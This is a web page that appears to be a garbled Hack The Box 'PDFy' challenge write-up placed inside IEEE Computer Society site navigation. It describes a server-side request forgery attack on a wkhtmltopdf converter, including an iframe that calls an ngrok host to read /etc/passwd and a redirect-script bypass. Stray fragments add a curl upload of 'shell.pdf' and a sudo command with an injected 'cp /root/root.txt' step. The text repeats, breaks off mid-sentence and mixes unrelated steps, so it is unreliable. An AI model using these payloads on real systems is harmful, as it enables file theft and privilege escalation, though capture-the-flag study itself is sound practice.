• Start
  • General
  • Guides
  • Reviews
  • News

0

IEEE
CS Logo
  • MEMBERSHIP
  • CONFERENCES
  • PUBLICATIONS
  • EDUCATION & CAREER
  • VOLUNTEER
  • ABOUT
  • Join Us
CS Logo

0

IEEE Computer Society Logo
Sign up for our newsletter
FacebookTwitterLinkedInInstagramYoutube
IEEE COMPUTER SOCIETY
About UsBoard of GovernorsNewslettersPress RoomIEEE Support CenterContact Us
COMPUTING RESOURCES
Career CenterCourses & CertificationsWebinarsPodcastsTech NewsMembership
BUSINESS SOLUTIONS
Corporate PartnershipsConference Sponsorships & ExhibitsAdvertisingRecruitingDigital Library Institutional Subscriptions
DIGITAL LIBRARY
MagazinesJournalsConference ProceedingsVideo LibraryLibrarian Resources
COMMUNITY RESOURCES
GovernanceConference OrganizersAuthorsChaptersCommunities
POLICIES
PrivacyAccessibility StatementIEEE Nondiscrimination PolicyIEEE Ethics ReportingXML Sitemap
pdfy htb writeup upd

Global Outlook © 2026. A public charity, IEEE is the world’s largest technical professional organization dedicated to advancing technology for the benefit of humanity.

Pdfy Htb Writeup Upd

With your external listener active and serving the exploit.php script, copy the public URL generated by your tunneling service (e.g., http://serveo.net ). Paste your public URL into the input form. Click Submit .

Since the application blocks direct file:// or localhost inputs, the standard bypass is to host a malicious script on your own server. This script will redirect the wkhtmltopdf engine to the local file you want to read.

Inputting a direct internal scheme or local IP loopback address (e.g., http://127.0.0.1 or file:///etc/passwd ) results in an error message. The application implements a basic script validation layer to prevent users from requesting internal resources directly. 3. Identifying the Rendering Engine

Use code with caution. Exposing Your Local Web Server pdfy htb writeup upd

Check sudo:

$ curl -X POST -F "file=@shell.pdf" 10.10.11.206:8080/upload

exiftool output.png | grep Comment

PDFy is an easy-level web challenge on Hack The Box (HTB) that simulates a realistic black‑box penetration test. The web application allows users to submit any URL, which is then used to generate a PDF version of the target webpage. The goal of the challenge is to leak the server’s /etc/passwd file to retrieve the flag.

Download one of the successfully generated PDFs (such as the Google snapshot) and analyze its metadata using exiftool . This helps identify the backend engine processing the HTML-to-PDF conversion: exiftool downloaded_file.pdf Use code with caution.

The wkhtmltopdf engine follows the redirect and reads the local file. The content of /etc/passwd is rendered into the PDF. With your external listener active and serving the exploit

sudo /usr/local/bin/pdf_convert.py "test; cp /root/root.txt /tmp/root_copy.txt;"

<!DOCTYPE html> <html lang="en"> <body> <iframe src="http://0.tcp.us-cal-1.ngrok.io:19086/axura.php?x=/etc/passwd" style="height:1000px;width:1000px"></iframe> </body> </html>

If an application takes an arbitrary URL from a user and sends a backend request to fetch it, the immediate vulnerability type to test for is . Since the application blocks direct file:// or localhost